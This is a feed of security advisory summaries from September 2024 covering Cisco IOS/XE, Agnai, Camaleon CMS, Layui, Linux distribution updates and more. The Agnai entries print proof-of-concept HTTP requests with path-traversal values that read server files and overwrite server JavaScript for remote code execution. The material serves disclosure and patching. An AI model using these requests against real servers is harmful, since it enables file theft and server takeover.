25.09.2024 19:00:00cisco[CISCO-SA-SDW-VEDOS-KQFFHPS3] Cisco SD-WAN vEdge Software UDP Packet Validation Denial of Service Vulnerability (medium)A vulnerability in the UDP packet validation code of Cisco SD-WAN vEdge Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected system. This vulnerability is due to incorrect handling of a specific type of malformed UDP packet. An attacker in a machine-in-the-middle position could exploit this vulnerability by sending crafted UDP packets to an affected device. A successful exploit could allow the attacker to cause the device to reboot, resulting in a DoS condition on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDW-VEDOS-KQFFHPS3
25.09.2024 19:00:00cisco[CISCO-SA-RSVP-DOS-OYPVGVZF] Cisco IOS and IOS XE Software Resource Reservation Protocol Denial of Service Vulnerability (high)A vulnerability in the Resource Reservation Protocol (RSVP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to a buffer overflow when processing crafted RSVP packets. An attacker could exploit this vulnerability by sending RSVP traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RSVP-DOS-OYPVGVZF
25.09.2024 19:00:00cisco[CISCO-SA-REPACL-9EXGNBPD] Cisco IOS Software on Cisco Industrial Ethernet Series Switches Access Control List Bypass Vulnerability (medium)A vulnerability in the access control list (ACL) programming of Cisco IOS Software running on Cisco Industrial Ethernet 4000, 4010, and 5000 Series Switches could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to the incorrect handling of IPv4 ACLs on switched virtual interfaces when an administrator enables and disables Resilient Ethernet Protocol (REP). An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to bypass an ACL on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-REPACL-9EXGNBPD
25.09.2024 19:00:00cisco[CISCO-SA-PIM-APBVFYSJ] Cisco IOS XE Software Protocol Independent Multicast Denial of Service Vulnerability (high)A vulnerability in the Protocol Independent Multicast (PIM) feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of received IPv4 PIMv2 packets. An attacker could exploit this vulnerability by sending a crafted PIMv2 packet to a PIM-enabled interface on an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition. Note: This vulnerability can be exploited with either an IPv4 multicast or unicast packet. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PIM-APBVFYSJ
25.09.2024 19:00:00cisco[CISCO-SA-IOS-XE-SDA-EDGE-DOS-MBCBG9K] Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability (high)A vulnerability in the DHCP Snooping feature of Cisco IOS XE Software on Software-Defined Access (SD-Access) fabric edge nodes could allow an unauthenticated, remote attacker to cause high CPU utilization on an affected device, resulting in a denial of service (DoS) condition that requires a manual reload to recover. This vulnerability is due to improper handling of IPv4 DHCP packets. An attacker could exploit this vulnerability by sending certain IPv4 DHCP packets to an affected device. A successful exploit could allow the attacker to cause the device to exhaust CPU resources and stop processing traffic, resulting in a DoS condition that requires a manual reload to recover. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-XE-SDA-EDGE-DOS-MBCBG9K
25.09.2024 19:00:00cisco[CISCO-SA-IOS-WEBUI-HFWNRGK] Cisco IOS and IOS XE Software Web UI Cross-Site Request Forgery Vulnerability (medium)A vulnerability in the web UI feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system through the web UI. This vulnerability is due to incorrectly accepting configuration changes through the HTTP GET method. An attacker could exploit this vulnerability by persuading a currently authenticated administrator to follow a crafted link. A successful exploit could allow the attacker to change the configuration of the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-WEBUI-HFWNRGK
25.09.2024 19:00:00cisco[CISCO-SA-HTTPSRVR-DOS-YOZTHUT] Cisco IOS XE Software HTTP Server Telephony Services Denial of Service Vulnerability (high)A vulnerability in the HTTP Server feature of Cisco IOS XE Software when the Telephony Service feature is enabled could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to a null pointer dereference when accessing specific URLs. An attacker could exploit this vulnerability by sending crafted HTTP traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, causing a DoS condition on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-HTTPSRVR-DOS-YOZTHUT
25.09.2024 19:00:00cisco[CISCO-SA-DNAC-SSH-E4UODASJ] Cisco Catalyst Center Static SSH Host Key Vulnerability (high)A vulnerability in the SSH server of Cisco Catalyst Center, formerly Cisco DNA Center, could allow an unauthenticated, remote attacker to impersonate a Cisco Catalyst Center appliance.This vulnerability is due to the presence of a static SSH host key. An attacker could exploit this vulnerability by performing a machine-in-the-middle attack on SSH connections, which could allow the attacker to intercept traffic between SSH clients and a Cisco Catalyst Center appliance. A successful exploit could allow the attacker to impersonate the affected appliance, inject commands into the terminal session, and steal valid user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DNAC-SSH-E4UODASJ
25.09.2024 19:00:00cisco[CISCO-SA-CPP-VFR-DOS-NHHKGGO] Cisco IOS XE Software IPv4 Fragmentation Reassembly Denial of Service Vulnerability (high)A vulnerability in the implementation of the IPv4 fragmentation reassembly code in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper management of resources during fragment reassembly. An attacker could exploit this vulnerability by sending specific sizes of fragmented packets to an affected device or through a Virtual Fragmentation Reassembly (VFR)-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: This vulnerability affects Cisco ASR 1000 Series Aggregation Services Routers and Cisco cBR-8 Converged Broadband Routers if they are running Cisco IOS XE Software Release 17.12.1 or 17.12.1a.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CPP-VFR-DOS-NHHKGGO
25.09.2024 19:00:00cisco[CISCO-SA-C9800-CWA-ACL-NPSBHSNA] Cisco IOS XE Software for Wireless Controllers CWA Pre-Authentication ACL Bypass Vulnerability (medium)A vulnerability in the Central Web Authentication (CWA) feature of Cisco IOS XE Software for Wireless Controllers could allow an unauthenticated, adjacent attacker to bypass the pre-authentication access control list (ACL), which could allow access to network resources before user authentication.This vulnerability is due to a logic error when activating the pre-authentication ACL that is received from the authentication, authorization, and accounting (AAA) server. An attacker could exploit this vulnerability by connecting to a wireless network that is configured for CWA and sending traffic through an affected device that should be denied by the configured ACL before user authentication. A successful exploit could allow the attacker to bypass configured ACL protections on the affected device before the user authentication is completed, allowing the attacker to access trusted networks that the device might be protecting.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-C9800-CWA-ACL-NPSBHSNA
25.09.2024 17:31:10maven[MAVEN:GHSA-F5FW-25GW-5M92] Apache Hadoop: Temporary File Local Information Disclosure (low)Apache Hadoop’s `RunJar.run()` does not set permissions for temporary directory by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F5FW-25GW-5M92
25.09.2024 21:51:17npm[NPM:GHSA-6375-PG5J-8WPH] Denial of service in rocket chat message parser (moderate)Rocket.Chat 6.12.0, 6.11.2, 6.10.5, 6.9.6, 6.8.6, 6.7.8, and earlier is vulnerable to denial of service (DoS). Attackers who craft messages with specific characters may crash the workspace due to an issue in the message parser.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6375-PG5J-8WPH
25.09.2024 17:29:59maven[MAVEN:GHSA-6GCH-63WP-4V5F] Apache Linkis Spark EngineConn: Commons Lang's RandomStringUtils Random string security vulnerability (high)In Apache Linkis <= 1.5.0, a Random string security vulnerability in Spark EngineConn, random string generated by the Token when starting Py4j uses the Commons Lang's RandomStringUtils. Users are recommended to upgrade to version 1.6.0, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6GCH-63WP-4V5F
26.09.2024 02:27:45rustsec[RUSTSEC-0000-0000] `atty` is unmaintained
The maintainer of `atty` has [published](https://github.com/softprops/atty/commit/5bfdbe9e48c6ca6a4909e8d5b04f5e843a257e93) an official notice that the crate is no longer under development, and that users should instead rely on the functionality in the standard library's [`IsTerminal`](https://doc.rust-lang.org/std/io/trait.IsTerminal.html) trait.
## Alternative(s)
- [std::io::IsTerminal](https://doc.rust-lang.org/stable/std/io/trait.IsTerminal.html) - Stable since Rust 1.70.0 and the recommended replacement per the `atty` maintainer.
- [is-terminal](https://crates.io/crates/is-terminal) - Standalone crate supporting Rust older than 1.70.0
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-0000-0000
25.09.2024 18:23:14almalinux[ALSA-2024:7000] kernel security update (important)kernel security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7000
25.09.2024 18:10:43rubysec[RUBYSEC:CAMALEON_CMS-8FX8-3RG2-79XW] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)
A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload an SVG image containing JavaScript and it's also possible to upload an HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document, malicious JavaScript can be executed on their behalf (e.g. changing or deleting content inside of the CMS).
[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
## Impact
This issue may lead to account takeover due to reflected Cross-site scripting (XSS).
## Remediation
Only allow the upload of safe files such as PNG, TXT and others, or serve all "unsafe" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.
Additionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)
[3]: https://web.dev/articles/csp
To prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-8FX8-3RG2-79XW
27.09.2024 04:45:04fedora[FEDORA-2024-e60359f212] Fedora 39: chromium (critical)Update to 129.0.6668.70 * High CVE-2024-9120: Use after free in Dawn * High CVE-2024-9121: Inappropriate implementation in V8 * High CVE-2024-9122: Type Confusion in V8 * High CVE-2024-9123: Integer overflow in Skiahttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e60359f212
27.09.2024 04:30:23fedora[FEDORA-2024-aaff7345b8] Fedora 40: chromium (critical)Update to 129.0.6668.70 * High CVE-2024-9120: Use after free in Dawn * High CVE-2024-9121: Inappropriate implementation in V8 * High CVE-2024-9122: Type Confusion in V8 * High CVE-2024-9123: Integer overflow in Skiahttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aaff7345b8
26.09.2024 23:40:34ubuntu[USN-7045-1] libppd vulnerabilitylibppd could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7045-1
26.09.2024 23:35:22ubuntu[USN-7044-1] libcupsfilters vulnerabilitylibcupsfilters could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7044-1
26.09.2024 23:30:49ubuntu[USN-7043-1] cups-filters vulnerabilitiescups-filters could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-1
26.09.2024 23:24:02ubuntu[USN-7042-1] cups-browsed vulnerabilitycups-browsed could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-1
26.09.2024 23:12:01ubuntu[USN-7041-1] CUPS vulnerabilityCUPS could be made to crash or run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-1
26.09.2024 21:41:13slackware[SSA:2024-270-01] boost
New boost packages are available for Slackware 15.0 and -current to fix security issues.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/boost-1.78.0-i586-3_slack15.0.txz: Rebuilt.
  Get rid of hardcoded temporary paths in the cmake files. Since these paths
  point to a location that an unprivileged user could create and populate with
  files that could be picked up during a build, it's possible this bug could
  be used for malicious purposes.
  Thanks to jmacloue.
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/boost-1.78.0-i586-3_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/boost-1.78.0-x86_64-3_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/boost-1.86.0-i686-2.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/boost-1.86.0-x86_64-2.txz
**MD5 signatures**
Slackware 15.0 package:
7480389f2789669e7a0d7c72ff247842 boost-1.78.0-i586-3_slack15.0.txz
Slackware x86_64 15.0 package:
66cbb6fed84a2e79a9e2db7b3ca0a2c5 boost-1.78.0-x86_64-3_slack15.0.txz
Slackware -current package:
e884f4a39337c2ac3051b8ba349e49a1 l/boost-1.86.0-i686-2.txz
Slackware x86_64 -current package:
daa51704f0bdbf686e7b978b298c0d70 l/boost-1.86.0-x86_64-2.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg boost-1.78.0-i586-3_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-270-01
27.09.2024 00:11:07npm[NPM:GHSA-G54F-66MW-HV66] Agnai vulnerable to Relative Path Traversal in Image Upload (low)
### Summary
A vulnerability has been discovered in **Agnai** that permits attackers to upload image files at an attacker-chosen location on the server. This issue can lead to image file uploads to unauthorized or unintended directories, including overwriting of existing images, which may be used for defacement.
This does not affect:
- agnai.chat
- installations using S3-compatible storage
- self-hosting that is not publicly exposed
### CWE-35: Path Traversal
https://cwe.mitre.org/data/definitions/35.html
### CVSS 4.0 - 2.3 Low
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
### Details
This is a path traversal vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the `editCharacter` handler (https://github.com/agnaistic/agnai/blob/75abbd5b0f5e48ddecc805365cf1574d05ee1ce5/srv/api/character.ts#L140):
```http
POST /api/character/28cbe508-2fa9-4890-886e-61d73e22006c%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%61%70%70%2f%64%69%73%74%2f%64%61%6e%79%61%6e%67 HTTP/1.1
```
The path traversal character sequence makes its way into the `id` variable, which is then string-interpolated into `filename`:
```ts
export async function entityUpload(kind: string, id: string, attachment?: Attachment) {
  if (!attachment) return
  const filename = `${kind}-${id}`
  return upload(attachment, filename)
}
```
https://github.com/agnaistic/agnai/blob/75abbd5b0f5e48ddecc805365cf1574d05ee1ce5/srv/api/upload.ts#L55
No path normalization is conducted nor checked, so attackers can freely manipulate the path which the file is uploaded to.
### Impact
This vulnerability is classified as a path traversal vulnerability. Attackers can upload image files to arbitrary locations, potentially overwriting critical system image files.
### Credit
Security research in collaboration with Analyst [Danyang Liu (noe223)](https://github.com/noe233) @noe233
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G54F-66MW-HV66
27.09.2024 00:11:07npm[NPM:GHSA-H355-HM5H-CM8H] Agnai File Disclosure Vulnerability: JSON via Path Traversal (low)
### CWE-35: Path Traversal
https://cwe.mitre.org/data/definitions/35.html
### CVSS v3.1 4.3 - Medium
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
### Summary
A vulnerability has been discovered in **Agnai** that permits attackers to read arbitrary JSON files at attacker-chosen locations on the server. This issue can lead to unauthorized access to sensitive information and exposure of confidential configuration files.
**This only affects installations with `JSON_STORAGE` enabled, which is intended for local/self-hosting only.**
### Details & PoC
This is a path traversal vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request:
```http
GET /api/json/messages/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%61%70%70%2fpackage HTTP/1.1
```
In this example, the attacker retrieves the `package.json` file content from the server by manipulating the file path.
The request is processed by the `loadMessages` handler in `agnai/srv/api/json/index.ts` and a file is read and returned to the client. The read filename is constructed using string interpolation, with no guard or check for path traversal: https://github.com/agnaistic/agnai/blob/2b878b7ca66471c5dd080197ad9ca2f7f0022655/srv/api/json/index.ts#L77
#### Constraints
Environment constraints: JSON Storage enabled (non-standard)
### Impact
This vulnerability is classified as a path traversal vulnerability. Specifically, any JSON file on the server which the webserver process has read privileges for can be disclosed to the attacker.
### Credit
- @ropwareJB
- @noe233
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H355-HM5H-CM8H
27.09.2024 00:11:07npm[NPM:GHSA-MPCH-89GM-HM83] Agnai vulnerable to Remote Code Execution via JS Upload using Directory Traversal (critical)
## Summary
A vulnerability has been discovered in **Agnai** that permits attackers to upload arbitrary files to attacker-chosen locations on the server, including JavaScript, enabling the execution of commands within those files. This issue could result in unauthorized access, full server compromise, data leakage, and other critical security threats.
This **does not** affect:
- `agnai.chat`
- installations using S3-compatible storage
- self-hosting that is not publicly exposed
This **DOES** affect:
- publicly hosted installs without S3-compatible storage
### CWEs
CWE-35: Path Traversal
CWE-434: Unrestricted Upload of File with Dangerous Type
### CVSS 4.0 - **9.0 - Critical**
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
### Description
Path Traversal and Unrestricted Upload of File with Dangerous Type
Path Traversal Location
```http
POST /api/chat/5c25e8dc-67c3-40e1-9572-32df2e26ff38/temp-character HTTP/1.1

{"_id": "/../../../../../../app/srv/api/voice",...<omitted>}
```
In the following file, the `_id` parameter, which is a remote-supplied parameter, is not properly validated and sanitized.
https://github.com/agnaistic/agnai/blob/437227d9aa86132f3be3b41c89981cb393c903d0/srv/api/chat/characters.ts#L101
```ts
  const upserted: AppSchema.Character = {
    _id: body._id || `temp-${v4().slice(0, 8)}`,
    kind: 'character',
    createdAt: now(),
```
In the following file, the `filename` (or `id`) and `content` variables are not properly sanitized and validated:
https://github.com/agnaistic/agnai/blob/dev/srv/api/upload.ts#L63
```ts
export async function entityUploadBase64(kind: string, id: string, content?: string) {
  if (!content) return
  if (!content.includes(',')) return
  const filename = `${kind}-${id}`
  const attachment = toAttachment(content)
  return upload(attachment, filename)
}
```
```ts
function toAttachment(content: string): Attachment {
  const [prefix, base64] = content.split(',')
  const type = prefix.slice(5, -7)
  const [, ext] = type.split('/')
  return {
    ext,
    field: '',
    original: '',
    type: getType(ext),
    content: Buffer.from(base64, 'base64'),
  }
}
```
An attacker can freely specify arbitrary file types (and arbitrary base64-encoded file content), thereby permitting them to upload JavaScript files and, by abusing the `_id` parameter, to control the location of the file to overwrite an existing server file:
```http
POST /api/chat/5c25e8dc-67c3-40e1-9572-32df2e26ff38/temp-character HTTP/1.1
...
Connection: keep-alive

{"_id": "/../../../../../../app/srv/api/voice","name":"","description":"","culture":"en-us","tags":[],"scenario":"","appearance":"","visualType":"avatar","avatar":"data:image/js;base64,<omitted>","sprite":null,"greeting":"","sampleChat":"","voiceDisabled":false,"voice":{},"systemPrompt":"","postHistoryInstructions":"","insert":{"prompt":"","depth":3},"alternateGreetings":[],"creator":"","characterVersion":"","persona":{"kind":"text","attributes":{"text":[""]}},"imageSettings":{"type":"sd","steps":10,"width":512,"height":512,"prefix":"","suffix":"","negative":"","cfg":9,"summariseChat":true,"summaryPrompt":""}}
```
### Risk
The attacker can write arbitrary files to disk, including overwriting existing JavaScript to execute arbitrary code on the server, leading to a complete system compromise, server control, and further network penetration. Attackers can gain full access to the server.
### Recommendation
**Input Validation**
- Ensure thorough validation of user inputs, particularly the id parameter, file paths and file names, to prevent directory traversal and ensure they end up in the desired folder location post-normalization. [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
**Arbitrary File Upload**
- Restrict the types of files that can be uploaded via an allow-only list.
### Credits
- @ropwareJB
- @noe233
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPCH-89GM-HM83
27.09.2024 00:11:03npm[NPM:GHSA-J827-6RGF-9629] Layui has DOM Clobbering gadgets that leads to Cross-site Scripting (moderate)
### Summary
A DOM Clobbering vulnerability has been discovered in `layui` that can lead to Cross-site Scripting (XSS) on web pages where attacker-controlled HTML elements (e.g., `img` tags with unsanitized `name` attributes) are present.
It's worth noting that we've identified similar issues in other popular client-side libraries like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) and Vite ([CVE-2024-45812](https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3)), which might serve as valuable references.
### Background
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of JS code snippets) living in the existing libraries to transform it into executable code.
### Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that use the `layui` library and allow users to inject certain scriptless HTML tags with improperly sanitized `name` or `id` attributes.
### Patch
This problem has been patched in Layui 2.9.17. You can find the official fix announcement at: https://layui.dev/notes/share/security-currentscript.html
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-J827-6RGF-9629
26.09.2024 19:19:18ubuntu[USN-7040-1] ConfigObj vulnerabilityConfigObj could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7040-1
26.09.2024 14:58:55ubuntu[USN-7039-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7039-1
26.09.2024 14:24:20ubuntu[USN-7021-3] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-3
26.09.2024 13:57:17ubuntu[USN-7020-3] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-3
26.09.2024 13:09:27ubuntu[USN-7034-2] ca-certificates updateThe CA certificates in the ca-certificates package were updated.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-2
26.09.2024 21:25:14maven[MAVEN:GHSA-2QQ7-FCH2-PHQF] Maven Archetype Plugin: Maven Archetype integration-test may package local settings into the published artifact, possibly containing credentials (low)Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin. This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0. Users are recommended to upgrade to version 3.3.0, which fixes the issue. Archetype integration testing creates a file called ./target/classes/archetype-it/archetype-settings.xml. This file contains all the content from the user's ~/.m2/settings.xml file, which often contains information they do not want to publish. We expect that on many developer machines, this also contains credentials. When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact. If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot), their credentials would be published without them knowing.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2QQ7-FCH2-PHQF
27.09.2024 01:21:19npm[NPM:GHSA-HWXP-6QF7-Q3RC] Remote command execution in promptr (high)A remote command execution (RCE) vulnerability in promptr v6.0.7 allows attackers to execute arbitrary commands via a crafted URL.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HWXP-6QF7-Q3RC
26.09.2024 23:13:52rubysec[RUBYSEC:SQLITE-VEC-2024-46488] Heap-based Buffer Overflow in sqlite-vec (critical)sqlite-vec v0.1.1 was discovered to contain a heap buffer overflow via the npy_token_next function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file. Workaround for CVE in release 0.1.3.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:SQLITE-VEC-2024-46488
26.09.2024 15:26:22rustsec[RUSTSEC-2024-0375] `atty` is unmaintained
The maintainer of `atty` has [published](https://github.com/softprops/atty/commit/5bfdbe9e48c6ca6a4909e8d5b04f5e843a257e93) an official notice that the crate is no longer under development, and that users should instead rely on the functionality in the standard library's [`IsTerminal`](https://doc.rust-lang.org/std/io/trait.IsTerminal.html) trait.
## Alternative(s)
- [std::io::IsTerminal](https://doc.rust-lang.org/stable/std/io/trait.IsTerminal.html) - Stable since Rust 1.70.0 and the recommended replacement per the `atty` maintainer.
- [is-terminal](https://crates.io/crates/is-terminal) - Standalone crate supporting Rust older than 1.70.0
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0375
28.09.2024 04:28:14fedora[FEDORA-2024-01127974ec] Fedora 40: cups, libcupsfilters, libppd (critical)Fix for remote vulnerabilities against OpenPrinting cups-filtershttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-01127974ec
28.09.2024 04:20:55fedora[FEDORA-2024-cf6ab63871] Fedora 39: libcupsfilters, cups, cups-browsed, libppd (critical)Fix for remote vulnerabilities against OpenPrinting cups-filtershttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cf6ab63871
28.09.2024 03:18:15fedora[FEDORA-2024-3fc82fed09] Fedora 41: cups, libppd, cups-browsed, libcupsfilters (high)Fix for remote vulnerabilities against OpenPrinting cups-filtershttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3fc82fed09
